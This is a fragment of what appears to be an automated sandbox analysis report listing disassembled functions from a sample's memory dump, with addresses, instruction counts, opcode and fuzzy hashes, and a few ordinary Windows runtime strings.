                                                                                                      • Opcode ID: b500bcf85d5cbd7f093bb0f4634867aa2f442d5c499adb751c25462b6fedd243
                                                                                                      • Instruction ID: ca256832cf70e1d9782bcaf7dd9eee4ac156f3d74f2100dc168e4abc18f3ddac
                                                                                                      • Opcode Fuzzy Hash: b500bcf85d5cbd7f093bb0f4634867aa2f442d5c499adb751c25462b6fedd243
                                                                                                      • Instruction Fuzzy Hash: 4C827F75E002198FDF2ACFA9D8807EDBBB1BF44350F1581A9E919AB290D7B09D41CF91
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 01186420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID: 0-3916222277
                                                                                                      • Opcode ID: 7831e801fb8fb876c745410e4699485f2868c9e5d1357b01109d9386b2c40cf4
                                                                                                      • Instruction ID: 68b9cbab4a3b0498632b9f1c1af1e4cfea9cd204cf2e7fd92f764a688139872f
                                                                                                      • Opcode Fuzzy Hash: 7831e801fb8fb876c745410e4699485f2868c9e5d1357b01109d9386b2c40cf4
                                                                                                      • Instruction Fuzzy Hash: FF916371940619AFEB29EF95CD85FAEBBB8EF18B54F104065F600AB194D774AD00CFA0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 011AE10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID: 0-3916222277
                                                                                                      • Opcode ID: 9844880305e20b2435b968f6e7b7239abafc4cf660e7a366f018eb427826a449
                                                                                                      • Instruction ID: 9ef0d5ccaa41f5694c59170100233ebb6666bbcc88ed896157cde0428c90671f
                                                                                                      • Opcode Fuzzy Hash: 9844880305e20b2435b968f6e7b7239abafc4cf660e7a366f018eb427826a449
                                                                                                      • Instruction Fuzzy Hash: A191BF35902609BFDB2AABA5DC44FEFBFB9EF85754F50002AF501A7250EB349901CB91
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 0113A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: GlobalTags
                                                                                                      • API String ID: 0-1106856819
                                                                                                      • Opcode ID: 617a395d82045228657dab4f15921c8c5c9c37631f9a6cd7c0e4110780231e90
                                                                                                      • Instruction ID: cf1d48868858b8c7a5c36cc572e478e4474f8acb0c40d55f0774584845fd96e4
                                                                                                      • Opcode Fuzzy Hash: 617a395d82045228657dab4f15921c8c5c9c37631f9a6cd7c0e4110780231e90
                                                                                                      • Instruction Fuzzy Hash: C6716CB5E00B1A8FEF2CCF99D5906ADBBB1BF48750F14812EE505A7345E7319941CB50
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 011A4978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: .mui
                                                                                                      • API String ID: 0-1199573805
                                                                                                      • Opcode ID: 48a6d21ac90960895e36e320dd2a6d5ba4d7c38f3980479a72715c8363d54708
                                                                                                      • Instruction ID: 6f1f4c5d6c62cb1bbfdcfbd11f4f18295d1d0cf056f663cbabd03fc77dc337e9
                                                                                                      • Opcode Fuzzy Hash: 48a6d21ac90960895e36e320dd2a6d5ba4d7c38f3980479a72715c8363d54708
                                                                                                      • Instruction Fuzzy Hash: BE51A676D0032ADBDF19DF99D840AAEBFB4BF08654F494129E912BB640D7B49C01CBE4
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 0111E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: EXT-
                                                                                                      • API String ID: 0-1948896318
                                                                                                      • Opcode ID: c3630ab08a55446bc1888adc56feba6183423384c3791062c1636f9dea850272
                                                                                                      • Instruction ID: cf24862c44614d8383fb3d5f40fab1642682721c2d084cddd06d98542d6897e4
                                                                                                      • Opcode Fuzzy Hash: c3630ab08a55446bc1888adc56feba6183423384c3791062c1636f9dea850272
                                                                                                      • Instruction Fuzzy Hash: 564171725097129BE71ADBB5C840B6BFBE8AF88618F44093DFA84D7184E774D904C793
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 0117C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: BinaryHash
                                                                                                      • API String ID: 0-2202222882
                                                                                                      • Opcode ID: 488fdd06b4e1fc3d879711585cec84ae2601cf64717268c6a0208da59a48be8b
                                                                                                      • Instruction ID: 53b650a9f5e61cefbc0f8e39263cbbf7df182f0567feabfdc2fe9931e3458330
                                                                                                      • Opcode Fuzzy Hash: 488fdd06b4e1fc3d879711585cec84ae2601cf64717268c6a0208da59a48be8b
                                                                                                      • Instruction Fuzzy Hash: CD4133B1D0052EABDB25DB50DC84FDEB77CAB55718F0045E5AB08AB240DB709E898FE4
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 01196B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: #
                                                                                                      • API String ID: 0-1885708031
                                                                                                      • Opcode ID: 2041c08bf6a0a8da179527c83fc3387805d02bf46dc0a89f0a0082d7a6621da1
                                                                                                      • Instruction ID: 3db62b92c6bb4aa9d5de5b92c72980a7bf9c5a2f17db7d93dd8ca9b739115871
                                                                                                      • Opcode Fuzzy Hash: 2041c08bf6a0a8da179527c83fc3387805d02bf46dc0a89f0a0082d7a6621da1
                                                                                                      • Instruction Fuzzy Hash: D7312C31A007599BDF2ADF69C850FEE7BA8DF05704F144028F961AB282D775E905CB60
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 0117CA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: BinaryName
                                                                                                      • API String ID: 0-215506332
                                                                                                      • Opcode ID: d5ae4b5d65ae1b30bfda67a46ae44b99f26579f87824eaacf23a9747f0548223
                                                                                                      • Instruction ID: bf0a514c989641d9d90358d3f31299661c75cf353447c93d50895b2d5ed7c051
                                                                                                      • Opcode Fuzzy Hash: d5ae4b5d65ae1b30bfda67a46ae44b99f26579f87824eaacf23a9747f0548223
                                                                                                      • Instruction Fuzzy Hash: A531E13690051AAFEB1EDA59C855FBFFBB4EB807A0F124129B905A7350D7309E04DBE0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 011806F1 Relevance: 1.3, Strings: 1, Instructions: 79COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: `,
                                                                                                      • API String ID: 0-3251075597
                                                                                                      • Opcode ID: 9997bd9d4ee99edd8899ce6a0c1d4bcd7575df306bf2eecd64f59334b13f3a12
                                                                                                      • Instruction ID: 9bc712e9eab8f60f459273b67fab3361d675af24e32766430ce83716149925ba
                                                                                                      • Opcode Fuzzy Hash: 9997bd9d4ee99edd8899ce6a0c1d4bcd7575df306bf2eecd64f59334b13f3a12
                                                                                                      • Instruction Fuzzy Hash: C421B1719005299BCF18EF59C881ABEB7F4FF48744B554069F541EB240E738AD41CFA1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 01180946 Relevance: 1.3, Strings: 1, Instructions: 70COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: `,
                                                                                                      • API String ID: 0-3251075597
                                                                                                      • Opcode ID: c34d9a3c027047f2688332d5f9d963c5594ff4e22b91a8c849ed274076052210
                                                                                                      • Instruction ID: 37d3fa6f6469880e99578128d92e5e5829282f7c82eb7e27848f1ca3c6123e4d
                                                                                                      • Opcode Fuzzy Hash: c34d9a3c027047f2688332d5f9d963c5594ff4e22b91a8c849ed274076052210
                                                                                                      • Instruction Fuzzy Hash: D321E9B1E00209ABCB24DFAAD981AAEFBF9FF98710F10412EE515A7240D7709945CF54
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 0118892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0118895E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                                      • API String ID: 0-702105204
                                                                                                      • Opcode ID: fa8236399cfdd90228550f682c70d1b41d4dde4f20f9524743ae59f7a65653cb
                                                                                                      • Instruction ID: b1e0b845226df3a35b4fb5a9929a8fa10cbd3d8e3e33e914ceffeea4d1fcb4a5
                                                                                                      • Opcode Fuzzy Hash: fa8236399cfdd90228550f682c70d1b41d4dde4f20f9524743ae59f7a65653cb
                                                                                                      • Instruction Fuzzy Hash: D6012B36A14206DFEB3D7B5ADC84B667F66EFC1298B44412CF74116552DF206C81CF92
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 011A2000 Relevance: .8, Instructions: 757COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: efe895a9c8e8ede6d7748474a60be717b111a0e5f2437a0abe527ce1ee95d175
                                                                                                      • Instruction ID: ce071218bfdc30d9942139d2ce92d01927d0e52c8e80cf577dce58640e0ec19b
                                                                                                      • Opcode Fuzzy Hash: efe895a9c8e8ede6d7748474a60be717b111a0e5f2437a0abe527ce1ee95d175
                                                                                                      • Instruction Fuzzy Hash: A542D3396083419FE72DCF68C890A6BBFE5BF98704F88092DFA8697250D770D945CB52
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 01198158 Relevance: .6, Instructions: 617COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: d1d879ea18fb3b7ef76e4bdfd31dbb400148aa3f27a5d0b4851e39e2db07d735
                                                                                                      • Instruction ID: 2c0a17399d7c8caef55c51e29583e02909f959957cff8885f73de8c106dbfad3
                                                                                                      • Opcode Fuzzy Hash: d1d879ea18fb3b7ef76e4bdfd31dbb400148aa3f27a5d0b4851e39e2db07d735
                                                                                                      • Instruction Fuzzy Hash: 7F427D75E102198FEF28CF69C881BADBBF5BF89304F158099E959EB241D7349981CF60
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 01112840 Relevance: .6, Instructions: 605COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 4e0dd4f20ab21955c30b26591a6b8c1931d53099d45a38b7182b3186755e8a11
                                                                                                      • Instruction ID: a5cd469b47fb4a4be99e944845c4311973d35f90d73731ebf0147d472e122d45
                                                                                                      • Opcode Fuzzy Hash: 4e0dd4f20ab21955c30b26591a6b8c1931d53099d45a38b7182b3186755e8a11
                                                                                                      • Instruction Fuzzy Hash: 5A32DF70A007598FDB2DCF69C8447BEBBFABF84704F24412DD4869B284E736A861CB51
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 011AA118 Relevance: .6, Instructions: 591COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 9b7848ffb8c90d26bcb2ec5c3a4455ae98198f2e6473965a941a6c36c2e93452
                                                                                                      • Instruction ID: 29d74f5eeb8cd7b4a89ba37b5743ec4087751c07e8878f59c61bd17bba0bdd93
                                                                                                      • Opcode Fuzzy Hash: 9b7848ffb8c90d26bcb2ec5c3a4455ae98198f2e6473965a941a6c36c2e93452
                                                                                                      • Instruction Fuzzy Hash: 9B22C2786046618FEB2DCF2DE054372BFF1AF45304F89845AEA968F286D335E452CB61
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 01106A50 Relevance: .5, Instructions: 548COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 997adbec5a28c35f3e197a5f34e602173e24d6a226e23508f81de0c5a9631235
                                                                                                      • Instruction ID: 61f98d060cdc35b1e32ef11f4a079ef2583f1dd72ef3758db8c51f67822b9e80
                                                                                                      • Opcode Fuzzy Hash: 997adbec5a28c35f3e197a5f34e602173e24d6a226e23508f81de0c5a9631235
                                                                                                      • Instruction Fuzzy Hash: 2332DF70A04205DFDB2ACF68C480BAEB7F5FF88310F248569E956AB391D771E861CB51
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 01124A35 Relevance: .4, Instructions: 423COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                      • Instruction ID: d11324c25cb7dcc4a312d90c62711facd3aae156dddbdc1f7044a8fdd4e4ef72
                                                                                                      • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                      • Instruction Fuzzy Hash: 9EF19F70E0022A9BDB1DCF99C590BAEBBF9BF48314F058129E905EB740E774D861CB64
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 0119892B Relevance: .4, Instructions: 386COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: a5764c5b3950422e46bc6cdf8425afac50ea7e37e0dc8268447e8d74fe615ea9
                                                                                                      • Instruction ID: 2645f4e2fe971514e833f0e5c50c981a51dd5ec3062c5dd0b309aa3e5893b202
                                                                                                      • Opcode Fuzzy Hash: a5764c5b3950422e46bc6cdf8425afac50ea7e37e0dc8268447e8d74fe615ea9
                                                                                                      • Instruction Fuzzy Hash: 3AD1F371A0060E9BDF0DCF69C841AFEB7F1AF89304F198169D966E7241E739E901CB60
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 011065D0 Relevance: .4, Instructions: 383COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 23734c89afd1d79b845e5bf066da52c5a7d002a449bd066373e7e7b8658f23cd
                                                                                                      • Instruction ID: 7773cd224d417e0ee8007aee72192db6228862d12aa659dbf4f5449f5207a905
                                                                                                      • Opcode Fuzzy Hash: 23734c89afd1d79b845e5bf066da52c5a7d002a449bd066373e7e7b8658f23cd
                                                                                                      • Instruction Fuzzy Hash: C8E1B271A08342CFC71ACF28C480A6ABBE1FF89314F15896DF59587391E771E915CB92
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 010F8397 Relevance: .4, Instructions: 380COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 264d1a5280f98bf75bae78f89090a3e142f17e60c2d670727b92c2568dd88bad
                                                                                                      • Instruction ID: 8814af6c621e5e90218d733f32e36864c2cf1be5ccd7fe6bea1183b8e36ebfe2
                                                                                                      • Opcode Fuzzy Hash: 264d1a5280f98bf75bae78f89090a3e142f17e60c2d670727b92c2568dd88bad
                                                                                                      • Instruction Fuzzy Hash: A3D1E571A04206DBDB18DF69C882BFE77E6BF54304F04852EEA55DB680EB30E955CB60
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 01188243 Relevance: .3, Instructions: 322COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                      • Instruction ID: 9a81aa998957efa5f2f5d164652a098793f404f880eeab79b1e076e7becf83b3
                                                                                                      • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                      • Instruction Fuzzy Hash: 36B18574A006099FDB28EF99C940EAFBBB6FF84304F94845DAA4297795DB34E905CF10
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 01110535 Relevance: .3, Instructions: 300COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                      • Instruction ID: 211a207c707e49a2681694065e0ba8db399019a3b81d317dbe6ed606a35d3221
                                                                                                      • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                      • Instruction Fuzzy Hash: C3B12931A00646AFDB1DCB68C850BBEFBFAAF48304F1505A9E652D7285D731DD81CB91
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 011083C0 Relevance: .3, Instructions: 281COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: f29ad45960eae98ac349d6cf616705e73c7f46264a993e4390560546047d6eda
                                                                                                      • Instruction ID: 8f164748568259bab5c2c254776745f4c1eac025072aae3bf75c6cf6c6601df8
                                                                                                      • Opcode Fuzzy Hash: f29ad45960eae98ac349d6cf616705e73c7f46264a993e4390560546047d6eda
                                                                                                      • Instruction Fuzzy Hash: A0C16870A08341DFD769CF19C484BABB7E9BF88304F44496DE98987291D7B5E908CF92
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 010FC427 Relevance: .3, Instructions: 280COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: ab87aecfb6e08d92531bc682c29c7a048b9f454940728754a38ab662bdd58aa6
                                                                                                      • Instruction ID: 1d4ba2b7ba1d12e25fbabfebb745886b562e86387004f6eeb4115db259e0122b
                                                                                                      • Opcode Fuzzy Hash: ab87aecfb6e08d92531bc682c29c7a048b9f454940728754a38ab662bdd58aa6
                                                                                                      • Instruction Fuzzy Hash: 8FB17270A002698BEB68DF58C991BADB7F1EF44744F0485EDD64AE7641EB309DC5CB20
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 0112E5E7 Relevance: .3, Instructions: 278COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 1d568d6847aa4f2e1821d658e8ccfaeb5cec3be83a0f44f94f351be5a992cf87
                                                                                                      • Instruction ID: 6881a6a70fef207bb3304a5feb19e3d3718c35abfd2f2e795c88ea8a124cf4f6
                                                                                                      • Opcode Fuzzy Hash: 1d568d6847aa4f2e1821d658e8ccfaeb5cec3be83a0f44f94f351be5a992cf87
                                                                                                      • Instruction Fuzzy Hash: 15A13631E0162A9FEB3DDB58D854FAEBBB9FB00714F050125EA11AB280D7749D61CBD1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 01140185 Relevance: .3, Instructions: 276COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 409a83bfacbee3eb4feb2e7e56e2b939db9919678fae46cd257de53f01be832a
                                                                                                      • Instruction ID: 65e0fb13dbc805a052228f76fadbdf411e7b96cb8952fd2c9114cde117767883
                                                                                                      • Opcode Fuzzy Hash: 409a83bfacbee3eb4feb2e7e56e2b939db9919678fae46cd257de53f01be832a
                                                                                                      • Instruction Fuzzy Hash: 10A1A170B0061A9FDB2DDF6AC990BAAB7B1FF48718F044129FB4597281DB34A855CB90
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 011D4500 Relevance: .3, Instructions: 275COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
